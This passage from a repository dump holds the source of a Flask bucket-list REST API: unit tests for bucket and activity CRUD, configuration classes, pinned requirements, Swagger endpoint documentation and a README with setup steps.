"text": "'''A module to test the Bucket List class on crud for activities in a\nbucketlist\n'''\nimport unittest\nimport json\nfrom app import create_app, db\n\nclass TheActivitiesTestCase(unittest.TestCase):\n '''A class for testing the CRUD for activities in a bucket list'''\n\n def setUp(self):\n '''Initialising the app and variables for testing'''\n self.app = create_app(config_name=\"testing\")\n self.client = self.app.test_client\n self.bucketlist = {\"name\": \"Adventure\"}\n self.activity = {\"activity_name\": \"Climb the Himalayas\"}\n self.user_information = {\n \"user_email\": \"[email protected]\",\n \"user_password\": \"password\"\n }\n\n with self.app.app_context():\n db.create_all()\n\n def token(self):\n '''A method that registers a user, logs in a user, creates a token\n for the user and returns it'''\n self.client().post('/auth/register', data=self.user_information)\n result_of_login = self.client().post('/auth/login', data=self.user_information)\n token = json.loads(result_of_login.data.decode())['access-token']\n return token\n\n def post_a_bucket(self):\n '''A method that posts a bucket to the test_db, ideally all other\n methods use it so it acts as a method for posting for tests below.\n The method posts after registering and logging in and returns json\n data for posting an activity\n '''\n post_bucket_data = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.bucketlist\n )\n json_data = json.loads(post_bucket_data.data.decode('utf-8').replace(\"'\", \"\\\"\"))\n return json_data\n\n def post_an_activity(self):\n '''A method that posts and activity and returns the response'''\n bucket_json_data = self.post_a_bucket()\n return self.client().post('/bucketlists/{}/items/'.format(bucket_json_data['id']),\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.activity)\n\n def test_activity_creation(self):\n \"\"\"A method to test that the API creates an activity\"\"\"\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n self.assertIn('Climb the Himalayas', str(post_activity_data.data))\n\n def test_conflict_on_creation(self):\n '''A method to test that activity is not created if it already exists'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n post_activity_data_second_time = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.activity)\n self.assertEqual(post_activity_data_second_time.status_code, 409)\n\n\n def test_getting_all_activitites(self):\n '''A method to test that the API gets back all activities'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n result_of_get_activity = self.client().get('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_activity.data))\n\n def test_get_activity__id(self):\n '''A method to test getting an activity by providing the id of the activity'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n second_activity = {\"activity_name\": \"Climb Mt. 
Kilimanjaro\"}\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=second_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n result_of_get_activity_1 = self.client().get('/bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n )\n self.assertEqual(result_of_get_activity_1.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_activity_1.data)) \n result_of_get_activity_2 = self.client().get('/bucketlists/1/items/2',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity_1.status_code, 200)\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_get_activity_2.data))\n\n def test_q_search(self):\n '''Test getting back an activity using q for search happy path with activity exsiting'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n second_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=second_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n result_of_get_activity = self.client().get('bucketlists/1/items/?q=Climb Mt. Kilimanjaro',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_get_activity.data))\n self.assertNotIn('Climb the Himalayas', str(result_of_get_activity.data))\n\n def test_non_activity_search(self):\n '''Test the response if a non-existent activity is searched for'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n result_of_get_activity = self.client().get('bucketlists/1/items/?q=Climb Mt. Kilimanjaro',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('The activity name does not exist', str(result_of_get_activity.data))\n\n def test_get_activity_limit(self):\n '''A method to test the limit variable on happy path'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n second_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n third_activity = {\"activity_name\": \"Climb the Alps\"}\n fourth_activity = {\"activity_name\": \"Climb Mt. Everest\"}\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=second_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=third_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=fourth_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n result_of_get_activity = self.client().get('bucketlists/1/items/?limit=2',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_activity.data))\n self.assertIn('Climb Mt. 
Kilimanjaro', str(result_of_get_activity.data))\n self.assertNotIn('Climb the Alps', str(result_of_get_activity.data))\n self.assertNotIn('Climb Mt. Everest', str(result_of_get_activity.data))\n result_of_get_activity_1 = self.client().get('bucketlists/1/items/?limit=0',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity_1.status_code, 200)\n self.assertNotIn('Climb the Himalayas', str(result_of_get_activity_1.data))\n self.assertNotIn('Climb Mt. Kilimanjaro', str(result_of_get_activity_1.data))\n self.assertNotIn('Climb the Alps', str(result_of_get_activity_1.data))\n self.assertNotIn('Climb Mt. Everest', str(result_of_get_activity_1.data))\n self.assertIn('Zero returns no item', str(result_of_get_activity_1.data))\n\n def test_updating_an_activity(self):\n '''A method to test updating an activity happy path with correct\n details\n '''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n update_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n result_of_put = self.client().put('/bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data=update_activity\n )\n self.assertEqual(result_of_put.status_code, 200)\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_put.data))\n\n def test_update_similar_activity(self):\n '''Test that an activity is not updated if it already exists'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n update_activity = {\"activity_name\": \"Climb the Himalayas\"}\n result_of_put = self.client().put('/bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data=update_activity\n )\n self.assertEqual(result_of_put.status_code, 409)\n\n def test_deleting_an_activity(self):\n '''A method to test that deleting an activity works in happy path'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n result_of_delete_activity = self.client().delete('bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_delete_activity.status_code, 200)\n result_of_delete_activity_2 = self.client().delete('bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_delete_activity_2.status_code, 400)\n\n def tearDown(self):\n '''A method for removing all set variables and deleting our database'''\n with self.app.app_context():\n db.session.remove()\n db.drop_all()\n"
},
{
"alpha_fraction": 0.7217234969139099,
"alphanum_fraction": 0.7217234969139099,
"avg_line_length": 24.9069766998291,
"blob_id": "50516136d726a869052bb264aac0e5edd0c544b6",
"content_id": "b1588c1d0211e867c865dbea34ac27f644eea517",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1114,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 43,
"path": "/instance/config.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module for setting the configuration setting for when the app is on different\nmodes'''\nimport os\n\n\nclass Configurations(object):\n '''Parent class for configurations under config.py module'''\n DEBUG=False\n CSRF_ENABLED=True\n SECRET = os.getenv('SECRET')\n SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL')\n\n\nclass UnderProduction(Configurations):\n '''Configurations for whent the mode is under production'''\n DEBUG=False\n TESTING=False\n\n\nclass UnderStaging(Configurations):\n '''Configurations for when the mode is staging'''\n DEBUG=True\n\n\nclass UnderTesting(Configurations):\n '''Configurations for when the mode is under testing, whereby a separate test\n database will be used under this mode'''\n TESTING=True\n SQL_ALCHEMY_DATABASE_URI = os.getenv('postgresql://localhost/test_db')\n DEBUG=True\n\n\nclass UnderDevelopment(Configurations):\n '''Configuration for when the mode is development'''\n DEBUG=True\n\n\napp_configurations = {\n 'production': UnderProduction,\n 'staging': UnderStaging,\n 'testing': UnderTesting,\n 'development': UnderDevelopment\n}\n"
},
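The app_configurations mapping above is what the create_app factory in app/__init__.py indexes with its config_name argument, and swagger_documentation.py reads that name from the APP_SETTINGS environment variable. A minimal sketch tying the two together; the 'development' fallback is an assumption, not something the repo sets:

import os
from app import create_app

# APP_SETTINGS selects one of the keys in app_configurations
# ('production', 'staging', 'testing' or 'development')
config_name = os.getenv("APP_SETTINGS", "development")  # fallback is assumed
app = create_app(config_name)  # loads app_configurations[config_name] via from_object

if __name__ == "__main__":
    app.run(debug=app.config["DEBUG"])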
{
"alpha_fraction": 0.48242810368537903,
"alphanum_fraction": 0.6821086406707764,
"avg_line_length": 15.051281929016113,
"blob_id": "4fbbf41460f54e4f564304ec28765dfc9f5a12b5",
"content_id": "8fd136986475866c9001a1950d26f4efc5e4803e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 626,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 39,
"path": "/requirements.txt",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "alembic==0.9.5\nastroid==1.5.3\nautoenv==1.0.0\nbcrypt==3.1.3\ncffi==1.10.0\nclick==6.7\ncolorama==0.3.9\ncoverage==4.4.1\nflasgger==0.6.6\nFlask==0.12.2\nFlask-API==0.7.1\nFlask-Bcrypt==0.7.1\nFlask-Cors==3.0.3\nFlask-Migrate==2.1.0\nFlask-Script==2.0.5\nFlask-SQLAlchemy==2.2\nisort==4.2.15\nitsdangerous==0.24\nJinja2==2.9.6\njsonschema==2.6.0\nlazy-object-proxy==1.3.1\nMako==1.0.7\nMarkupSafe==1.0\nmccabe==0.6.1\nmistune==0.7.4\nnose==1.3.7\npsycopg2==2.7.3\npy==1.4.34\npycparser==2.18\nPyJWT==1.5.2\npylint==1.7.2\npytest==3.2.1\npython-dateutil==2.6.1\npython-editor==1.0.3\nPyYAML==3.12\nsix==1.10.0\nSQLAlchemy==1.1.13\nWerkzeug==0.12.2\nwrapt==1.10.11\n"
},
{
"alpha_fraction": 0.6261290311813354,
"alphanum_fraction": 0.6358841061592102,
"avg_line_length": 30.740825653076172,
"blob_id": "4b05a885e779f9e63a18df2512c1780e66866900",
"content_id": "be4b9d1cce506ecc59233db5f06192d3c5a52302",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13839,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 436,
"path": "/swagger_documentation.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module that contains documentation for swagger implementation\nwhich maps to the files for the flask api\n'''\nimport os\nfrom flasgger import Swagger\n\nfrom app import create_app\n\nCONFIG_NAME = os.getenv('APP_SETTINGS')\napp = create_app(CONFIG_NAME)\nSWAGGER = Swagger(app)\n\[email protected]('/auth/register', methods=['POST'])\ndef register_user():\n \"\"\"Endpoint creating a user\n To register insert a valid email address such as '[email protected]' or '[email protected]'\n Insert a password for the email that you insert. The password can be a string.\n ---\n parameters:\n - name: user_email\n in: formData\n type: string\n description: A valid email for a user\n required: true\n - name: user_password\n in: formData\n type: string\n description: password for the user\n required: true\n responses:\n 201:\n description: User has been created\n 401:\n description: User creation has been unauthorised by the server\n 409:\n description: An identical user with the same email address already exists.\n 400:\n description: Key variables used or the values entered are not suitable. Bad request.\n \"\"\"\n pass\n\[email protected]('/auth/login', methods=['POST'])\ndef login_user():\n \"\"\"Endpoint logging in a user\n To login ensure that you have an account that is registered. Insert a valid email address\n on the key variable user_email and the password registered it with.\n ---\n parameters:\n - name: user_email\n in: formData\n type: string\n description: A valid email for a user\n required: true\n - name: user_password\n in: formData\n type: string\n description: password for the user\n required: true\n responses:\n 400:\n description: Key variables to be entered are supposed\n to be user_email and user_password. The email has to be valid.\n 401:\n description: User has been unauthorised.\n 200:\n description: User has been logged in.\n \"\"\"\n pass\n\[email protected]('/auth/reset-password', methods=['POST'])\ndef reset_password():\n \"\"\"Endpoint reseting password for a user\n Insert the current password that you use for your account on the user_password key.\n Insert a new password for your account on the new_password key.\n Verify that you inserted it right by inserting it on the verify_new_password key.\n ---\n parameters:\n - name: user_password\n in: formData\n type: string\n description: Current password for the user\n required: true\n - name: new_password\n in: formData\n type: string\n description: New password for the user\n required: true\n - name: verify_new_password\n in: formData\n type: string\n description: Password verifier for the user\n required: true\n responses:\n 401:\n description: Unauthorised.\n 400:\n description: The request made has an error witht the data given.\n 201:\n description: New password generated.\n \"\"\"\n pass\n\[email protected]('/auth/logout', methods=['POST'])\ndef logout_user():\n \"\"\"Endpoint logging out a user\n Log out the user by pressing the button\n ---\n responses:\n 200:\n description: User logged out\n \"\"\"\n pass\n\[email protected]('/bucketlists/', methods=['POST'])\ndef post_bucketlist():\n \"\"\"Endpoint for posting a bucketlist\n On the variable name insert a name for the bucket list\n ---\n parameters:\n - name: name\n in: formData\n type: string\n description: A bucket name that does not exist in the bucketlist\n required: true\n - name: Authorization\n description: Token that should begin with the word Beare and a space 'Bearer '\n in: header\n type: string\n required: true\n responses:\n 401:\n 
description: Unauthorised\n 400:\n description: No bucket name entered\n 201:\n description: Bucket name created\n 409:\n description: The bucket name entered already exists in the bucketlist\n \"\"\"\n pass\n\[email protected]('/bucketlists/')\ndef get_bucketlist():\n \"\"\"Endpoint for getting a bucketlist\n A route that returns all the bucketlists for the user if no arguments are provided.\n Authorization refers to the clients token for authorising a user.\n Q asks for a string on th bucket name to enter.\n Limit asks for an integer to limit the number of buckets to return\n ---\n parameters:\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after to\n separate the two statements 'Bearer '\n in: header\n type: string\n required: true\n - name: q\n description: A query for asking for the string for searching\n in: query\n type: string\n - name: limit\n description: A limit for returning the number of buckets inserted\n in: query\n type: integer\n responses:\n 200:\n description: Request passed\n 400:\n description: Wrong value entered on the limit or bad route\n 401:\n description: User unauthorized\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:id>', methods=['GET'])\ndef manipulate_bucketlist():\n \"\"\"Endpoint for getting a specific bucket using its id\n Insert integer for the id to get the bucket list using its bucket id.\n Authorization refers to the client's token for authorising a user.\n ---\n parameters:\n - name: id\n in: path\n type: integer\n required: true\n description: The bucket list id\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after\n to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User unauthorized due to wrong id for the bucket list\n 400:\n description: The id does not represent an id for a bucket in the bucketlist\n 200:\n description: The bucket item with the bucket id above has been returned\n \"\"\"\n pass\n\[email protected]('/bucketlists/<id>', methods=['PUT'])\ndef update_bucketlist():\n \"\"\"Endpoint for updating a bucketlist\n The route updates a bucket using the id of the bucket to determine the exact\n bucket and a name to replace the original name of the bucket\n ---\n parameters:\n - name: id\n in: path\n type: integer\n required: true\n description: An id for the bucket.\n - name: name\n in: formData\n type: string\n description: A bucket name that does not already exist in the user's bucketlist.\n required: true\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after to\n separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User has not been authorized majorly due to wrong token supplied\n 400:\n description: Bad request due to wrong id or no name granted for the bucket\n 201:\n description: Bucket replaced and new bucket created\n 409:\n description: A similar bucket with the same name was created before\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:id>', methods=['DELETE'])\ndef delete_bucketlist():\n \"\"\"Endpoint for deleting a bucketlist\n The route deletes a bucket using the id supplied by the user\n ---\n parameters:\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after to\n separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n - name: id\n in: path\n 
type: integer\n required: true\n description: An id for the bucket.\n responses:\n 401:\n description: User has not been authorized majorly due to wrong token supplied\n 400:\n description: Bad request due to wrong id granted for the bucket\n 200:\n description: Bucket has been deleted\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/', methods=['POST'])\ndef post_activities():\n \"\"\"Endpoint for deleting an activity\n Post an activity on a particular bucket by using the bucket id\n ---\n parameters:\n - name: activity_name\n in: formData\n type: string\n description: An activity within the bucketlist, that does not exist in the\n specific bucketlist\n required: true\n - name: bucket_id\n in: path\n type: integer\n description: The id for the bucket\n required: true\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after\n to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User has not been authorized majorly due to wrong token supplied\n 400:\n description: Bad request due to id or no activity name supplied\n 201:\n description: New activity name created\n 409:\n description: Activity not created because it already exists in this users\n bucket list as it was created before\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/', methods=['GET'])\ndef get_activities():\n \"\"\"Endpoint for getting activities\n A method for returning activities, by supplying an id for a specific bucket\n ---\n parameters:\n - name: bucket_id\n in: path\n type: integer\n description: The id for the bucket\n required: true\n - name: Authorization\n description: Token that should begin with the word Bearer and a space\n after to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Users unauthorized\n 400:\n description: Bad reqeust possibly because wrong id supplied for the\n bucket list, no data given for search parameter\n 200:\n description: Request acted on\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods=['GET'])\ndef manipulate_activity():\n \"\"\"Endpoint for retrieving a particular activity\n A route for returning a specific activity using its bucket_id and activity_id\n ---\n parameters:\n - name: activity_id\n in: path\n required: true\n description: An id for an activity the user wants to retrieve\n type: integer\n - name: bucket_id\n in: path\n required: true\n description: An id for a bucket a user wants to retrieve an activity from\n type: integer\n - name: Authorization\n description: Token that should begin with the word Bearer and a space\n after to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Unauthorized\n 400:\n description: Bad request, bucket id does not exist for this user,\n activity id does not exist for this user\n 200:\n description: Activity returned successfully\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods=['PUT'])\ndef update_activity():\n \"\"\"Endpoint for updating an activity\n A method for updating an activity by replacing the name of the activity\n ---\n parameters:\n - name: activity_name\n in: formData\n type: string\n description: An activity within the bucketlist, that does not exist in the\n specific bucketlist\n required: true\n - name: activity_id\n in: 
path\n required: true\n description: An id for an activity the user wants to retrieve\n type: integer\n - name: bucket_id\n in: path\n required: true\n description: An id for a bucket a user wants to retrieve an activity from\n type: integer\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after\n to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User unauthorized\n 400:\n description: Bad request the bucket does not exist or the activity does not\n exist from the respective ids given by the user\n 409:\n description: Activity name had been entered before posing conflict with new\n activity name inserted\n 200:\n description: Activity updated\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods=['DELETE'])\ndef delete_activity():\n \"\"\"Endpoint for deleting an activity\n A method for deleting an activity using the bucket and activity id\n ---\n parameters:\n - name: activity_id\n in: path\n required: true\n description: An id for an activity the user wants to retrieve\n type: integer\n - name: bucket_id\n in: path\n required: true\n description: An id for a bucket a user wants to retrieve an activity from\n type: integer\n - name: Authorization\n description: Token that should begin with the word Bearer and a space\n after to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Unauthorized\n 400:\n description: Bad request the bucket id and activity id does not exist\n 200:\n description: Activity id deleted\n \"\"\"\n pass\n\napp.run(debug=True)\n"
},
{
"alpha_fraction": 0.6411007046699524,
"alphanum_fraction": 0.6413934230804443,
"avg_line_length": 65.98039245605469,
"blob_id": "0961fdc38b6bfd914dd99c10bf436fd4469c750c",
"content_id": "0d005c23bb222a9acee1f5766f83fa075603cfcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3416,
"license_type": "no_license",
"max_line_length": 423,
"num_lines": 51,
"path": "/README.md",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/WinstonKamau/FLASK_API)\n\n[](https://coveralls.io/github/WinstonKamau/FLASK_API?branch=master)\n# FLASK_API\nFlask Api is a restful api that serves clients by allowing them to create, read, update and delete buckets as well as activities within their buckets. By buckets we refer to a larger class category of things clients would love to do in their lives before they die for example 'Travelling'. By activities/items we refer to a more detail explanation of the bucket, search as 'Travel to Morrocco and visit the formula E arena'\n\n# Features\n- The flask api allows users to register using a user email and a user password\n- The flask api allows users to login using their respective email an passwords\n- The flask api allows users to reset passwords.\n- The flask api allows users to log out, the logout function simply deletes tokens on the client server but this has not yet been implemented\n- The flask api allows users to create, retrieve and manipulate buckets\n- The flask api allows a user to create, retrieve and manipulate activities\n\n#Technologies used\n- Python3\n- Flask\n- Postgresql\n# Setup\n-Create a folder that will host the project\n-Clone https://github.com/WinstonKamau/FLASK_API.git\n-Ensure that you are working in a virtual environment. `pip install virtualenv`>\n-Create a .env file\n-On your .env file set you database url to link to your postgresql account.\n `export DATABASE_URL=\"postgresql://localhost/flask_api\"` if you have a password ensure that the link above delivers the username and password. e.g. `export DATABASE_URL=\"postgresql://username:password@localhost/flask_api\"`\n-On the .env file set `export FLASK_APP to run.py`\n-On the .env file set `export SECRET=\"any string you choose\"`\n-On the .env file set `export APP_SETTINGS=\"development`\n-Install the requirements on the requirements.txt file `pip install -r requirements.txt`\n-Create a migrations folder by running `python migrate db init`\n-Migrate the migrations by running `python migrate db migrate`\n-Run `python migrate db upgrade` to persist migrations\n-To run the app on flassger use `python swagger_documentations.py`\n-To run the app on postman user `flask run`\n-Run the app using `python run.py `\n\n# API ENDPOINTS\n| **REQUEST** | **ENDPOINT** | **Public Access** |\n| ----------- | ----------------------------------| ----------------- |\n| POST | /auth/register | True |\n| POST | /auth/login | True |\n| POST | /auth/reset-password | True |\n| POST | /auth/logout | True |\n| POST | /bucketlists/ | False | \n| GET | /bucketlists/ | False |\n|GET | /bucketlists/<id> | False |\n| PUT | /bucketlists/<id> | False |\n| DELETE | /bucketlists/<id> | False |\n| POST | /bucketlsits/<id>/items/ | False |\n| PUT | /bucketlists/<id>/items/<item_id> | False |\n| DELETE | /bucketlists/<id>/items/<item_id> | False |\n"
},
{
"alpha_fraction": 0.46435871720314026,
"alphanum_fraction": 0.47425907850265503,
"avg_line_length": 52.9862060546875,
"blob_id": "7c26065d5a690772875e71a969e085e41a99e413",
"content_id": "92bcc431225c4c41ea4ce80d788df8ae24ac4e01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15656,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 290,
"path": "/tests/test_bucketlist.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module to test the Bucket List class on crud for bucketlists '''\nimport unittest\nimport json\nfrom app import create_app, db\n\nclass TheBucketTestCase(unittest.TestCase):\n '''A class to test the functionalities of creating reading updating and deleting a\n bucketlist'''\n\n def setUp(self):\n '''Initialising the app and variables for testing'''\n self.app = create_app(config_name=\"testing\")\n self.client = self.app.test_client\n self.bucketlist = {\"name\": \"Climb the Himalayas\"}\n self.user_information = {\n \"user_email\": \"[email protected]\",\n \"user_password\": \"password\"\n }\n with self.app.app_context():\n db.create_all()\n\n def token(self):\n '''A method that registers a user, logs in a user, creates a token\n for the user and returns it'''\n self.client().post('/auth/register', data=self.user_information)\n result_of_login = self.client().post('/auth/login', data=self.user_information)\n token = json.loads(result_of_login.data.decode())['access-token']\n return token\n\n def post_a_bucket(self):\n '''A method that posts a bucket to the test_db, ideally all other\n methods use it so it acts as a method for posting for tests below.\n The method posts after registering and logging in\n '''\n return self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.bucketlist\n )\n\n def test_bucketlist_creation(self):\n \"\"\"A method to test that the API creates a bucket\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n self.assertIn('Climb the Himalayas', str(post_data.data))\n\n def test_wrong_keys_provided(self):\n '''Posting a path with wrong key and no key name provided'''\n wrong_key = {'wrong_key': 'Travel'}\n result_of_wrong_key = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=wrong_key\n )\n self.assertEqual(result_of_wrong_key.status_code, 400)\n self.assertIn('The key variable name', str(result_of_wrong_key.data))\n result_of_wrong_key_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ))\n self.assertEqual(result_of_wrong_key_2.status_code, 400)\n\n def test_if_bucket_already_exists(self):\n '''A method to test that creation does not happen if the bucket\n already exists\n '''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_second_time = self.post_a_bucket()\n self.assertEqual(post_data_second_time.status_code, 409)\n self.assertIn('A bucket list exists with a similar name of',\n str(post_data_second_time.data))\n\n def test_read_bucket(self):\n \"\"\"A method to test that the api reads a bucket\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_method.data))\n\n\n def test_read_bucket_using_id(self):\n '''A method to test the retrieval of one bucket using an id placed in brackets\n on the after the '/bucketlists/' statement below\n '''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n #converting the response from posting to json format\n json_data = json.loads(post_data.data.decode('utf-8').replace(\"'\", \"\\\"\"))\n final_data = self.client().get('/bucketlists/{}'.format(json_data['id']),\n 
headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(final_data.status_code, 200)\n self.assertIn('Climb the Himalayas', str(final_data.data))\n\n def test_read_bucket_using_q(self):\n '''Test reading a bucket using q when the bucket exists'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n result_of_get_method = self.client().get(\"/bucketlists/?q=Climb the Himalayas\",\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn(\"Climb the Himalayas\", str(result_of_get_method.data))\n self.assertNotIn('Family', str(result_of_get_method.data))\n\n def test_q_no_item(self):\n '''A method to test reading a bucket using q where the bucket does not\n exist\n '''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_get_method = self.client().get(\"/bucketlists/?q=aisdo\",\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Name does not exist', str(result_of_get_method.data))\n\n def test_read_bucket_using_limit(self):\n '''A method to test reading buckets using the limit parameter'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n post_data_3 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Travel\"})\n self.assertEqual(post_data_3.status_code, 201)\n post_data_4 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Adventure\"})\n self.assertEqual(post_data_4.status_code, 201)\n post_data_5 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Acts of Kindness\"})\n self.assertEqual(post_data_5.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/?limit=3',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Family', str(result_of_get_method.data))\n self.assertIn('Travel', str(result_of_get_method.data))\n self.assertIn('Climb the Himalayas', str(result_of_get_method.data))\n self.assertNotIn('Adventure', str(result_of_get_method.data))\n self.assertNotIn('Acts of Kindness', str(result_of_get_method.data))\n\n def test_limit_zero(self):\n '''Test reading buckets using a limit of zero'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n 